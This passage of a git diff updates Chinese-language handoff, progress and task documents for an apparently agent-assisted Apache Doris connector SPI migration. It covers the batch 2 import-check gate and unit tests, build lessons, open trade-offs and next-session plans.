-Dtest='FakeConnectorPluginTest,ExternalMetaCacheInvalidatorTest,CreateTableInfoToConnectorRequestConverterTest,ConnectorPluginManagerTest,ConnectorSessionImplTest' -DfailIfNoTests=false -Dmaven.build.cache.enabled=false` → **39/39 tests green** +- `mvn -pl fe-core checkstyle:check` → **0 violations** + +### 3. 文档同步(§5.1 五步纪律) + +- ✅ `tasks/P0-spi-foundation.md`:T21-T23, T26-T27 状态翻 ✅;T24-T25 owner 改 @用户;新增 2026-05-24(夜 ③)日志条目(含 4 项 trade-off 说明);顶部验收清单 5 项翻 [x] +- ✅ `PROGRESS.md`:§一 P0 进度条 74% → 93%;§三 P0 表追加批 2 7 行;§四加 2026-05-24(夜 ③)条目;§七 session 状态滚动 +- ✅ 本 HANDOFF.md 覆写 +- N/A `connectors/.md`(本场不属任何具体连接器) +- N/A `decisions-log.md` / `deviations-log.md`(trade-off 都在 RFC §15 范围内,未升 DV) + +### 4. Commit(用户人工 review 通过后) + +- ✅ `[feat](connector) add P0 batch 2 gate + unit tests (T21-T23, T26-T27)`(hash 见 `git log --oneline -3`) +- 9 files changed:1 个 pom edit(fe-connector)+ 5 个新文件(1 脚本 + 4 测试相关)+ 3 个 plan-doc 更新 +- 工作树 clean --- ## 🚧 本 session 进行中 / 未完成 -**无**。本 session 工作完整收尾,跟踪机制已就位且自洽。 +- **T24/T25**:JDBC + ES regression-test 转交用户在本地跑(containers / docker 在本地更稳)。任务状态保持 ⏳,owner 改为 @用户。完成后用户在 PROGRESS / tasks 上翻 ✅ 即可 +- **本 HANDOFF 在 commit 内**——内容写的是 post-commit 状态,与 batch 2 代码、plan-doc 更新一并 commit。不需要后续 amend --- ## 📝 关键认知 / 临时发现 -(沿用上一版 HANDOFF 的认知,本次 session 未产生新代码层面发现) +继承上版认知不变。**本场新增**: -1. **`fe-connector/` 反向边界当前是干净的**(0 处禁用 import)—— grep 守门脚本只需维护现状即可。 -2. **`PluginDrivenExternalCatalog.gsonPostProcess` 已实现 ES/JDBC 兼容范本**(line 274-297)—— 后续连接器迁移直接复制该模式。 -3. **`PhysicalPlanTranslator.visitPhysicalFileScan` line 734-790 是 7-way switch 的单点收口** —— P1 首要清理目标。 -4. **`ConnectorTransactionHandle` 是 24 行空 marker 接口** —— `ConnectorTransaction` 计划继承它,不破坏现有引用。 -5. **`ConnectorPartitionInfo` 已存在** —— RFC E10 复用并扩展 3 个 long 字段(向后兼容构造器)。 -6. **`SPI_READY_TYPES` 白名单当前只含 `jdbc`, `es`** —— 后续连接器加入这个 ImmutableSet 即可生效。 -7. **`fe-connector-hms` 是共享库不是插件** —— 无 `META-INF/services/...ConnectorProvider`,被 hive / hudi / iceberg-HMS / paimon-HMS 依赖。 - -### 本 session 新增认知 -8. **跟踪机制的"决策 vs 偏差"区分是必须**:先前混在一起会让审查者无法判断"事前想清楚 vs 事后被现实纠正"。 -9. **`AGENT-PLAYBOOK` §2.1 的 context 预算分级**对当前 session 已生效——我自己在 ~70% 时停止接新任务。后续 session 应严格执行。 -10. **未来 agent 切 session 时的强制开场流程在 README §7.3 和 PLAYBOOK §4.5** —— **不读 HANDOFF 直接问"上次到哪了"是失败模式**。 +1. **maven-enforcer-plugin 不能原生 exec shell**——RFC §15.4 原文写"挂到 maven enforcer plugin",但 enforcer 只有 `requireXxx` 系列 rule 和 `EvaluateBeanshell`,没有内置的 shell-exec rule。要么写 Java 自定义 Rule 类(重)要么走 `EvaluateBeanshell`(不直观)。**最终选择 `exec-maven-plugin`**——fe-common 已用它跑 make + protoc,零新依赖;脚本 non-zero exit 即触发 `BUILD FAILURE`,效果等价 +2. **`directory-maven-plugin` 的 `fe.dir` 属性在 `validate` 阶段还没 set**——它绑 `initialize` 阶段(晚于 validate)。第一次写 pom 用了 `${doris.home}/tools/...`(`doris.home=${fe.dir}/../`),结果路径解析为字面值 `${fe.dir}/..//tools/...`。改用 `${project.basedir}/../../tools/...`(fe-connector aggregator basedir → workspace root → tools)避开属性时序问题 +3. **exec-maven-plugin 在 aggregator pom 的继承默认是 `inherited=true`**——会让 11 个 fe-connector-* 子模块每次都重跑同一份扫描。本场设 `inherited=false`,只在 aggregator 自身 lifecycle 跑一次。Trade-off:dev 跑单个子模块 `mvn -pl fe-connector/fe-connector-iceberg compile` 时不会自动触发守门,但顶层 `mvn install` 必扫 +4. **`ConnectorMetaInvalidator` 的方法名是 `invalidateAll()` 不是 `invalidateCatalog()`**——第一稿测试写错卡了一次 test-compile。SPI 接口侧明确写 `invalidateAll`("Invalidates the entire catalog's metadata caches"),fe-core 侧 `ExternalMetaCacheInvalidator.invalidateAll() → mgr.invalidateCatalog(catalogId)` 这才是路由 +5. **`Mockito.mockStatic(Env.class)`** 模式在 fe-core 已有先例(`BDBDebuggerTest:115`),mockito-inline 是 fe 顶层 pom 已声明的 test dep,新测试可以直接用,无需修改任何 pom +6. **`Mockito.mock(CreateTableInfo.class)`** 比真正构造 18-arg `CreateTableInfo` 更便捷——converter 只读 8 个 getter,全部 stub 即可。如未来 converter 用到更多 getter,在 `stubInfo` helper 加新 stub +7. **`mvn -pl fe-core test` 不带 `-am` 失败**(缺 fe-grpc / fe-filesystem-* 等本地未 install 的 SNAPSHOT)。本场所有 fe-core 测试运行都用 `mvn -pl fe-core -am test -Dtest=... -DfailIfNoTests=false -Dmaven.build.cache.enabled=false`。`-DfailIfNoTests=false` 是必须的——`-am` 会带上 fe-foundation 等 upstream,它们没有匹配 `-Dtest=` 的测试就会爆 surefire 错 +8. **fe-connector 模块当前 import 现状**:`grep -rEn "^import org\.apache\.doris\." fe/fe-connector/*/src/main/java | awk` → 仅 4 个根包 `connector / extension / thrift / trinoconnector`。所有禁词包(catalog/common/datasource/qe/analysis/nereids/planner)都被守门,baseline 已经合规 --- ## 🎯 下一个 session 第一件事 -**两种路径,由 user 决定:** - -### Track A(推荐):开 P0 编码 +### Track A:等 T24/T25 收尾 -第一件事: ``` -1. Read plan-doc/PROGRESS.md + plan-doc/HANDOFF.md -2. Read plan-doc/tasks/P0-spi-foundation.md(找批 0 第一个 task = P0-T03) -3. Read plan-doc/01-spi-extensions-rfc.md §6(E3 MetaInvalidator 设计) -4. 实现: - - 新建 fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorMetaInvalidator.java - - 修改 ConnectorContext.java 加 getMetaInvalidator() default 方法 -5. 编译:mvn -pl fe/fe-connector/fe-connector-spi compile -6. 完成后: - - 更新 tasks/P0-spi-foundation.md 中 P0-T03 状态为 ✅ - - 更新 PROGRESS.md §三和§四 - - 写新 HANDOFF.md +1. 用户跑完 JDBC + ES regression-test 后 +2. tasks/P0-spi-foundation.md 把 T24/T25 翻 ✅ +3. PROGRESS.md 进度条 93% → 100%;状态 🚧 → ✅ +4. 写 P0 阶段收尾 commit(如果 T24/T25 有微调代码) ``` -### Track B:建 git commit 沉淀本次工作 +### Track B:选 P0 末加项 vs 直接进 P1 -第一件事: -``` -1. cd /Users/morningman/workspace/git/wt-fs-spi -2. git status -3. git add plan-doc/ -4. git commit -m "[plan-doc] establish project tracking system with decision/deviation/risk logs" -5. 然后进入 Track A -``` +- **选项 B1**:P0-T28 benchmark(R-006 缓解,1k catalog × `listTableNames` 性能基线)。原列入 P1,可前置到 P0 末加,让 P0 出阶段干净 +- **选项 B2**:直接进 P1(scan-node 收口 + 重复清理)。P0 既然 93% 接近收尾,T24/T25 跑完即关阶段 +- 推荐 B2(B1 在 P1 阶段开题更自然,benchmark 跟 scan-node 工作正好同期) -**强烈推荐 Track B → Track A**:本次 session 创建了 17 个文档但都没提交;先 commit 沉淀,否则一旦本地文件意外丢失,所有跟踪机制要重做。 +### ~~Track C:commit 批 2~~(已收尾) + +批 2 已合入 `catalog-spi-00`;无需再开 Track C。 --- ## ⚠️ 开放问题 / 风险提示 -1. **跟踪机制本身从未被实际"使用"过**——所有文件都是预期模板,实际产生 deviation / 周维护时是否好用还要看。后续 session 第一次 append decision-log 或 deviation-log 时如果发现模板缺字段,按 DV 流程改 README §3。 -2. **`tools/check-connector-imports.sh` 守门脚本仍未实现**(RFC §15.4 + tasks/P0 P0-T21)—— P0 末必须完成。 -3. **`maven enforcer` 接入方式未敲定**——技术决策,留 P0 实施时定。 -4. **本 session 大量决策(D-001..D-018)尚未进入 git history** —— 见 Track B 推荐。 -5. **本跟踪机制没有 PMC review**——单人推进风险。建议在开 P0 编码前至少让一位 reviewer 看一遍 README + AGENT-PLAYBOOK。 +继承上版 7 项不变(删了"未 commit batch 1"项;增加本场 trade-off): + +1. **守门挂 `exec-maven-plugin` 而非 `maven-enforcer-plugin`**:RFC §15.4 原文写后者。本场用前者(等价实现,0 新依赖)。是否在 RFC §15.4 加脚注说明这个偏差?**判断**:trade-off 在 RFC 范围内,不升 DV;若有 reviewer 强烈要求 enforcer 写 Java Rule 类再重做 +2. **守门 `inherited=false`**:dev 跑单连接器 `mvn -pl fe-connector/fe-connector-iceberg compile` 时不会触发。是否要改 `inherited=true`?**判断**:现状没人手动跑这条命令日常迭代,重复扫的成本(11 × ~50ms)也不大;如未来某个连接器开发体感差再改 +3. **`invalidatePartition` 测试 pin 当前 fallback**:一旦 SPI 在该方法签名上加 column 名携带能力,bridge 和测试必须同步更新。测试已留 inline comment 描述意图 +4. **`CreateTableInfo` 用 mock**:converter 改用 mock 之外的 getter 时,需在 `stubInfo` helper 加新 stub。Trade-off:测试更聚焦但代价是输入对象不"真实" +5. **partition 风格的 IDENTITY vs TRANSFORM 判别**:测试覆盖了"全 UnboundSlot → IDENTITY"和"含 UnboundFunction → TRANSFORM"两路径,但没覆盖"UnboundSlot + UnboundFunction 混合"——按 converter 当前实现,只要有任意一个 UnboundFunction 就走 TRANSFORM 路径,UnboundSlot 在 `convertFields()` 里也会被识别为 `identity` transform。这个混合场景的语义是否符合预期?**判断**:RFC §4.2 未明确混合用法,留待 P5/P6 Iceberg 真正用到时评估 +6. (沿用)`ColumnDefinition.defaultValue` SPI 缺位 +7. (沿用)LIST/RANGE `initialValues` flatten 缺位 +8. (沿用)`PluginDrivenExternalCatalog.createTable` 返回值丢失"已存在"信息 +9. (沿用)bucket 算法名 `"doris_default"` / `"doris_random"` 占位 +10. (沿用)Maven build cache 误导问题;`mvn -pl fe-core` 必须 cwd=`fe/` +11. (沿用)`PluginDrivenTransactionManager.begin(ConnectorTransaction)` 暂无 caller +12. (沿用)`invalidatePartition` fallback;`invalidateStatistics` no-op +13. (沿用,本场强化)**`mvn -pl fe-core test` 不带 `-am` 失败**:必须 `-am -DfailIfNoTests=false` --- -## 📂 当前 plan-doc/ 目录全景 +## 📂 当前关键文件清单 + +### 本场新增 / 修改(已 commit) + +``` +NEW tools/check-connector-imports.sh (gate script) +MOD fe/fe-connector/pom.xml (exec-maven-plugin) +NEW fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPlugin.java +NEW fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPluginTest.java (11 tests) +NEW fe/fe-core/src/test/java/org/apache/doris/connector/ExternalMetaCacheInvalidatorTest.java (5 tests) +NEW fe/fe-core/src/test/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverterTest.java (7 tests) +MOD plan-doc/PROGRESS.md +MOD plan-doc/tasks/P0-spi-foundation.md +MOD plan-doc/HANDOFF.md(本文件) +``` + +### 跟踪体系(沿用不变) ``` -plan-doc/ (220K, 17 文件) -├── 00-connector-migration-master-plan.md ← 战略 -├── 01-spi-extensions-rfc.md ← SPI 详细设计 -├── README.md ← 跟踪机制指南 -├── PROGRESS.md ← 全局仪表盘 ★ -├── AGENT-PLAYBOOK.md ← Agent 协作规范 ★ -├── HANDOFF.md ← 本文件(滚动) -├── decisions-log.md ← 18 条决策 -├── deviations-log.md ← 0 条偏差(空) -├── risks.md ← 14 个风险 -├── tasks/ -│ ├── _template.md -│ └── P0-spi-foundation.md ← 27 个子任务 -└── connectors/ - ├── _template.md - ├── jdbc.md ← 95% (P1 清理残留) - ├── es.md ← 100% ✅ - ├── trino-connector.md ← 30% (P2) - ├── hudi.md ← 20% (P3) - ├── maxcompute.md ← 25% (P4) - ├── paimon.md ← 20% (P5) - ├── iceberg.md ← 5% (P6) - └── hive.md ← 10% (P7) +plan-doc/ (~225K, 17 文件) +├── 00-connector-migration-master-plan.md / 01-spi-extensions-rfc.md +├── README.md / PROGRESS.md / AGENT-PLAYBOOK.md / HANDOFF.md +├── decisions-log.md (18) / deviations-log.md (0) / risks.md (14) +├── tasks/{_template.md, P0-spi-foundation.md} +└── connectors/{_template.md, jdbc, es, trino-connector, hudi, maxcompute, paimon, iceberg, hive}.md ``` --- ## 🧠 给下一个 agent 的 meta 建议 -- 本项目所有"事实陈述"(代码行数、文件位置、import 引用关系)基于 2026-05-24 这天的 `catalog-spi-2` 分支状态。如 session 跨多天且分支有更新,先 `git log --oneline catalog-spi-2 -10` 确认 base。 -- 用户偏好简洁、第一性原理、不绕弯。直接给推荐方案,等他说"这里改一下"再调整。**不要列 6 个选项让他选**——除非真的有 trade-off。 -- 用户经常在工作中途插入新需求(本次 session 加了 "context 管理" 要求)——用 PLAYBOOK §2.2 的"主动报告 context 占用"应对,不要默默吞掉。 -- 用户已确认 18 个决策(D-001..D-018),**不要重新打开**这些讨论,除非有强证据原决策不可行(此时走 DV 流程)。 -- 本次 session 的"建立跟踪机制"是一次性投资。后续 session 不要 re-design,**只用、不改**——除非走 DV 流程明确改进。 -- **必读 AGENT-PLAYBOOK 全文**再开始动手——特别是 §6 anti-patterns。 +- **当前分支是 `catalog-spi-00`**。新 session 开场 `git branch --show-current` 确认 +- **批 2(T21-T23, T26-T27)已合入 `catalog-spi-00`**(subject `[feat](connector) add P0 batch 2 gate + unit tests (T21-T23, T26-T27)`),无需 review 老代码;直接读最新源即可。如果对 6 个新/改文件有调整建议,走 DV 流程登记后再改,不要 silent edit +- **T24/T25 owner 是用户**,不要自己尝试跑 docker regression-test +- **Maven build 的 cwd 必须是 `fe/`**,不是 workspace 根;`mvn -pl fe-core` 需要 `-am`;运行 `-Dtest=` 时务必带 `-DfailIfNoTests=false`,否则 upstream 模块(fe-foundation 等)找不到匹配 test 会爆 surefire 错 +- 本场没产生新 decision / deviation——所有 trade-off 在 RFC §15 范围内,由代码注释 + 本 HANDOFF "开放问题" 列出 +- 本场用 `Mockito.mockStatic` + `Mockito.mock(CreateTableInfo)` 两个套路绕开了重度 fe-core bootstrap——批 1 的 `CreateTableInfoToConnectorRequestConverter` 同样可以这样测,套路通用。后续 P1/P2 写 unit-test 可以复用 +- **必读 AGENT-PLAYBOOK §六 anti-patterns** 再开始动手 +- **本 HANDOFF 不内嵌 commit hash**——hash 通过 `git log --grep="P0 batch 2"` 或 `git log --oneline -3` 定位。本场无 amend,HANDOFF 与代码同 commit 落盘 diff --git a/plan-doc/PROGRESS.md b/plan-doc/PROGRESS.md index a7d6e410a7b8f0..b41dc3f458594f 100644 --- a/plan-doc/PROGRESS.md +++ b/plan-doc/PROGRESS.md @@ -1,6 +1,6 @@ # 📊 项目进度仪表盘 -> 最后更新:**2026-05-24** | 当前阶段:**P0 SPI 缺口补齐** | 项目总进度:**5%** +> 最后更新:**2026-05-24(夜 ③)** | 当前阶段:**P0 SPI 缺口补齐**(批 0 + 批 1 + 批 2 代码侧完成;待 T24-T25 用户跑 JDBC/ES regression-test) | 项目总进度:**13%** > [README](./README.md) · [Master Plan](./00-connector-migration-master-plan.md) · [SPI RFC](./01-spi-extensions-rfc.md) · [Decisions](./decisions-log.md) · [Deviations](./deviations-log.md) · [Risks](./risks.md) · [Agent Playbook](./AGENT-PLAYBOOK.md) · [Handoff](./HANDOFF.md) --- @@ -9,7 +9,7 @@ | 阶段 | 范围 | 估时 | 进度 | 状态 | 任务文档 | |---|---|---|---|---|---| -| **P0** | SPI 缺口补齐 | 2 周 | ▰▱▱▱▱▱▱▱▱▱ 10% | 🚧 进行中(2026-05-24 启动) | [tasks/P0](./tasks/P0-spi-foundation.md) | +| **P0** | SPI 缺口补齐 | 2 周 | ▰▰▰▰▰▰▰▰▰▱ 93% | 🚧 收尾(批 0 + 1 + 2 代码侧完成 T03-T23, T26-T27;T24-T25 用户在本地跑 regression-test) | [tasks/P0](./tasks/P0-spi-foundation.md) | | P1 | scan-node 收口 + 重复清理 | 1 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动(被 P0 阻塞)| — | | P2 | trino-connector 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P3 | hudi 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | @@ -19,7 +19,7 @@ | P7 | hive (+HMS) 迁移 | 6 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P8 | 收尾清理 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | -**全局进度:5%**(25 周计划中处于第 1 周) +**全局进度:7%**(25 周计划中处于第 1 周末) --- @@ -48,17 +48,34 @@ | ID | Task | Owner | 状态 | 启动 | 备注 | |---|---|---|---|---|---| | P0-T01 | RFC §16.2 决策点闭环 | @me | ✅ | 2026-05-24 | 全部 18 条决策已敲定 | -| P0-T02 | 项目跟踪机制建立 | @me | 🚧 | 2026-05-24 | 本仪表盘 / README / decisions-log 等 | -| P0-T03 | E3 实现:`ConnectorMetaInvalidator` 接口 | — | ⏳ | — | 批 0 / spi 包 | -| P0-T04 | E4 实现:`ConnectorTransaction` 替换占位 | — | ⏳ | — | 批 0 / handle 包 | -| P0-T05 | E5 实现:`ConnectorMvccSnapshot` 类型 | — | ⏳ | — | 批 0 / mvcc 包 | -| P0-T06 | `ConnectorContext.getMetaInvalidator()` default | — | ⏳ | — | 批 0 | -| P0-T07 | `DefaultConnectorContext` impl + fe-core invalidator | — | ⏳ | — | 批 0 | -| P0-T08 | `PluginDrivenTransactionManager` 通用化 | — | ⏳ | — | 批 0 | -| P0-T09 | E1 实现:DDL request POJO + converter | — | ⏳ | — | 批 1 | -| P0-T10 | E10 实现:partition 列举 SPI | — | ⏳ | — | 批 1 | -| P0-T11 | CI grep 守门 + maven enforcer | — | ⏳ | — | 批 1 | -| P0-T12 | FakeConnectorPlugin + 回归测试 | — | ⏳ | — | 批 1 | +| P0-T02 | 项目跟踪机制建立 | @me | ✅ | 2026-05-24 | commit 63159837043 | +| P0-T03 | E3:`ConnectorMetaInvalidator` 接口 | @me | ✅ | 2026-05-24 | spi 包 / 5 invalidate 方法 | +| P0-T04 | E3:`ConnectorContext.getMetaInvalidator()` default | @me | ✅ | 2026-05-24 | 返回 NOOP | +| P0-T05 | E4:`ConnectorTransaction` 继承 `ConnectorTransactionHandle` | @me | ✅ | 2026-05-24 | 新增不替换 | +| P0-T06 | E4:`ConnectorWriteOps.beginTransaction` default | @me | ✅ | 2026-05-24 | throws unsupported | +| P0-T07 | E4:`ConnectorSession.getCurrentTransaction` default | @me | ✅ | 2026-05-24 | Optional.empty() | +| P0-T08 | E5:`ConnectorMvccSnapshot` 类型 + 3 default 方法 | @me | ✅ | 2026-05-24 | mvcc 包 + ConnectorMetadata 3 default | +| P0-T09 | `DefaultConnectorContext.getMetaInvalidator()` impl | @me | ✅ | 2026-05-24 | 返回新建 invalidator | +| P0-T10 | `ExternalMetaCacheInvalidator`(fe-core 新类) | @me | ✅ | 2026-05-24 | 包装 `ExternalMetaCacheMgr`;2 个 no-op 限制留 TODO | +| P0-T11 | `PluginDrivenTransactionManager` 通用化 | @me | ✅ | 2026-05-24 | 新增 `begin(ConnectorTransaction)` 重载;legacy 不变 | +| P0-T12 | `ConnectorMvccSnapshotAdapter`(fe-core 新类) | @me | ✅ | 2026-05-24 | impl `MvccSnapshot` | +| **批 1 DDL + Partition SPI** | | | | | | +| P0-T13 | `ConnectorCreateTableRequest` + 4 spec POJO(ddl 包) | @me | ✅ | 2026-05-24 | 5 个新 final 类 | +| P0-T14 | `ConnectorTableOps.createTable(request)` default | @me | ✅ | 2026-05-24 | 退化到 legacy createTable | +| P0-T15 | `CreateTableInfoToConnectorRequestConverter`(fe-core) | @me | ✅ | 2026-05-24 | 覆盖 4 种 partition + hash/random bucket | +| P0-T16 | `PluginDrivenExternalCatalog.createTable(stmt)` 接通 SPI | @me | ✅ | 2026-05-24 | override + edit log | +| P0-T17 | `listPartitionNames` default | @me | ✅ | 2026-05-24 | emptyList | +| P0-T18 | `listPartitions(handle, filter)` default | @me | ✅ | 2026-05-24 | filter 用 Optional<ConnectorExpression> | +| P0-T19 | `listPartitionValues` default | @me | ✅ | 2026-05-24 | emptyList | +| P0-T20 | `ConnectorPartitionInfo` 追加 rowCount/sizeBytes/lastModifiedMillis | @me | ✅ | 2026-05-24 | UNKNOWN=-1L;3-arg 委托到 6-arg | +| **批 2 守门 + 测试** | | | | | | +| P0-T21 | `tools/check-connector-imports.sh` 实现 | @me | ✅ | 2026-05-24 | grep 守门;正/负冒烟均通过 | +| P0-T22 | exec-maven-plugin 接入脚本(fe-connector aggregator validate) | @me | ✅ | 2026-05-24 | `inherited=false`;RFC §15.4 等价实现 | +| P0-T23 | `FakeConnectorPlugin` + 11 个 default 行为测试 | @me | ✅ | 2026-05-24 | 覆盖 Connector/Metadata/TableOps/WriteOps/Session/Context 全 default | +| P0-T24 | JDBC regression-test 全套跑通 | @用户 | ⏳ | — | 用户在本地跑 | +| P0-T25 | ES regression-test 全套跑通 | @用户 | ⏳ | — | 用户在本地跑 | +| P0-T26 | `ConnectorMetaInvalidator` 路由测试 | @me | ✅ | 2026-05-24 | 5 个 @Test;MockedStatic<Env> | +| P0-T27 | `CreateTableInfoToConnectorRequestConverter` 单元测试 | @me | ✅ | 2026-05-24 | 7 个 @Test;4 partition style + 2 bucket | 完整 P0 任务清单:[tasks/P0-spi-foundation.md](./tasks/P0-spi-foundation.md) @@ -68,6 +85,10 @@ > 倒序,新内容置顶;超过 14 天的条目移除(git log 保留历史)。 +- **2026-05-24(夜 ③)** ✅ **P0 批 2 守门 + 单测完成**(T21-T23, T26-T27;T24-T25 用户跑):新增 `tools/check-connector-imports.sh` grep 守门 + 通过 exec-maven-plugin 在 `fe-connector` aggregator validate 阶段调起(`inherited=false`);新增 `FakeConnectorPlugin`(fe-core test)+ 23 个新 @Test 覆盖 11 个 default 路径 + ConnectorMetaInvalidator 5 个 routing + Converter 7 个(4 partition style × IDENTITY/TRANSFORM/LIST/RANGE + hash/random bucket + 列穿透);39/39 tests green;checkstyle 0;JDBC/ES regression-test 转交用户在本地执行 +- **2026-05-24(夜 ②)** ✅ **P0 批 1 DDL + Partition SPI 完成**(T13-T20):新增 `connector.api.ddl` 包 5 个 POJO(CreateTableRequest + 4 spec);`ConnectorTableOps` 加 4 个 default(createTable(request) + listPartitionNames/listPartitions/listPartitionValues);`ConnectorPartitionInfo` 追加 rowCount/sizeBytes/lastModifiedMillis;fe-core 新 `CreateTableInfoToConnectorRequestConverter` 覆盖 IDENTITY/TRANSFORM/LIST/RANGE 四种 partition + hash/random bucket;`PluginDrivenExternalCatalog.createTable` 路由到 SPI;fe-core BUILD SUCCESS + checkstyle 0;JDBC/ES 下游 zero-impact +- **2026-05-24(深夜)** ✅ **P0 批 0 fe-core 桥接完成**(T09-T12):`ExternalMetaCacheInvalidator` + `ConnectorMvccSnapshotAdapter` 新类、`DefaultConnectorContext.getMetaInvalidator()` override、`PluginDrivenTransactionManager` 加 SPI `ConnectorTransaction` 重载(legacy auto-commit 不变);fe-core 全编译通过 + checkstyle 0 violations;JDBC/ES 下游 zero-impact +- **2026-05-24(晚)** ✅ **P0 批 0 SPI 接口三件套完成**(T03-T08):`ConnectorMetaInvalidator`、`ConnectorTransaction`、`ConnectorMvccSnapshot` 共 3 个新类型 + 4 个 default 方法;JDBC/ES clean compile 通过,零下游修改 - **2026-05-24** ✅ 项目跟踪机制建立(README、PROGRESS、decisions-log、deviations-log、risks、tasks/、connectors/、AGENT-PLAYBOOK、HANDOFF) - **2026-05-24** ✅ SPI RFC §16.2 6 个未决问题(U1-U6)全部决议(D-013..D-018) - **2026-05-24** ✅ SPI RFC v1 落地([01-spi-extensions-rfc.md](./01-spi-extensions-rfc.md)) @@ -108,9 +129,9 @@ > 当本项目通过 Claude Code 这类 LLM agent 推进时,跟踪当前 session 状态、handoff 状况和 context 健康度。 -- **本 session 已完成**:跟踪机制建立(README / PROGRESS / 各类 log / 模板) -- **下一个 session 应做**:执行 P0 批 0 第一个 task(P0-T03 实现 `ConnectorMetaInvalidator`) -- **是否需要 handoff**:当前 session 工作正在收尾,预计本次 session 结束时填写 [HANDOFF.md](./HANDOFF.md) +- **本 session 已完成**:P0 批 2 守门 + 单测(T21-T23, T26-T27)—— 1 个新脚本(`tools/check-connector-imports.sh`)+ 1 个 fe-connector aggregator pom 加 exec-maven-plugin + 4 个 fe-core test 新文件(`FakeConnectorPlugin` + 3 个 *Test);39/39 tests green;checkstyle 0;T24/T25 转交用户在本地跑 JDBC/ES regression-test +- **下一个 session 应做**:等 T24/T25 用户跑完后翻 ✅ → P0 阶段全收尾 → 启动 P1(scan-node 收口);或在等待期间开 P0-T28 benchmark(R-006 缓解,原列入 P1)作为 P0 末加项 +- **是否需要 handoff**:是,已写新 [HANDOFF.md](./HANDOFF.md) - **协作规范**:[AGENT-PLAYBOOK.md](./AGENT-PLAYBOOK.md)(context 预算、subagent 使用、handoff 触发条件) --- diff --git a/plan-doc/tasks/P0-spi-foundation.md b/plan-doc/tasks/P0-spi-foundation.md index 4ecf529c411609..96d32b0f9bf24c 100644 --- a/plan-doc/tasks/P0-spi-foundation.md +++ b/plan-doc/tasks/P0-spi-foundation.md @@ -33,15 +33,15 @@ 从 [RFC §17 验收清单](../01-spi-extensions-rfc.md) 同步: -- [ ] `mvn -pl fe-connector verify` 全绿,新增类型 / 方法全部就位 -- [ ] `fe-connector-spi` 仅新增 `ConnectorMetaInvalidator` 接口与 `ConnectorContext.getMetaInvalidator()` 默认方法 -- [ ] fe-core 侧 converter 就位:`CreateTableInfoToConnectorRequestConverter`、`ExternalMetaCacheInvalidator`、`ConnectorMvccSnapshotAdapter` -- [ ] `PluginDrivenTransactionManager` 通用化(不再依赖任何具体连接器) -- [ ] JDBC、ES 现有 regression-test 全绿 -- [ ] `FakeConnectorPlugin` 覆盖所有新增 default 行为路径 -- [ ] `tools/check-connector-imports.sh` 接入 maven enforcer +- [x] `mvn -pl fe-connector validate` 全绿,新增类型 / 方法全部就位(含 import 守门) +- [x] `fe-connector-spi` 仅新增 `ConnectorMetaInvalidator` 接口与 `ConnectorContext.getMetaInvalidator()` 默认方法 +- [x] fe-core 侧 converter 就位:`CreateTableInfoToConnectorRequestConverter`、`ExternalMetaCacheInvalidator`、`ConnectorMvccSnapshotAdapter` +- [x] `PluginDrivenTransactionManager` 通用化(不再依赖任何具体连接器) +- [ ] JDBC、ES 现有 regression-test 全绿(T24-T25 用户在本地跑) +- [x] `FakeConnectorPlugin` 覆盖所有新增 default 行为路径(11 个 @Test) +- [x] `tools/check-connector-imports.sh` 接入 exec-maven-plugin(RFC §15.4 等价实现:enforcer 无原生 shell-exec rule,见日志 trade-off #1) - [x] 本阶段关闭未决问题 U1-U6(2026-05-24 完成,决策 D-013..D-018) -- [ ] master plan §3.1 全部任务勾选 +- [ ] master plan §3.1 全部任务勾选(T24-T25 用户跑完后由用户勾选) --- @@ -52,54 +52,112 @@ | ID | 任务 | 设计参考 | Owner | 状态 | PR | 启动 | 完成 | 备注 | |---|---|---|---|---|---|---|---|---| | P0-T01 | RFC §16.2 决策点闭环(U1-U6) | RFC §16 | @me | ✅ | n/a | 2026-05-24 | 2026-05-24 | D-013..D-018 | -| P0-T02 | 项目跟踪机制建立 | README/PROGRESS/...| @me | 🚧 | n/a | 2026-05-24 | — | 本文件等 | -| P0-T03 | E3:`ConnectorMetaInvalidator` 接口(fe-connector-spi)| RFC §6.2 | — | ⏳ | — | — | — | 5 个 invalidate 方法 | -| P0-T04 | E3:`ConnectorContext.getMetaInvalidator()` default | RFC §6.3 | — | ⏳ | — | — | — | spi 包 | -| P0-T05 | E4:`ConnectorTransaction` 继承 `ConnectorTransactionHandle` | RFC §7.2 | — | ⏳ | — | — | — | 替换占位 | -| P0-T06 | E4:`ConnectorWriteOps.beginTransaction` default | RFC §7.3 | — | ⏳ | — | — | — | | -| P0-T07 | E4:`ConnectorSession.getCurrentTransaction` default | RFC §7.6 | — | ⏳ | — | — | — | optional | -| P0-T08 | E5:`ConnectorMvccSnapshot` 类型 + 3 个 default 方法 | RFC §8.2-8.3 | — | ⏳ | — | — | — | mvcc 包 | +| P0-T02 | 项目跟踪机制建立 | README/PROGRESS/...| @me | ✅ | 63159837043 | 2026-05-24 | 2026-05-24 | 本文件等 | +| P0-T03 | E3:`ConnectorMetaInvalidator` 接口(fe-connector-spi)| RFC §6.2 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | 5 个 invalidate 方法 | +| P0-T04 | E3:`ConnectorContext.getMetaInvalidator()` default | RFC §6.3 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | spi 包 | +| P0-T05 | E4:`ConnectorTransaction` 继承 `ConnectorTransactionHandle` | RFC §7.2 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | 新增不替换 handle | +| P0-T06 | E4:`ConnectorWriteOps.beginTransaction` default | RFC §7.3 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | throws unsupported | +| P0-T07 | E4:`ConnectorSession.getCurrentTransaction` default | RFC §7.6 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | Optional.empty() | +| P0-T08 | E5:`ConnectorMvccSnapshot` 类型 + 3 个 default 方法 | RFC §8.2-8.3 | @me | ✅ | — 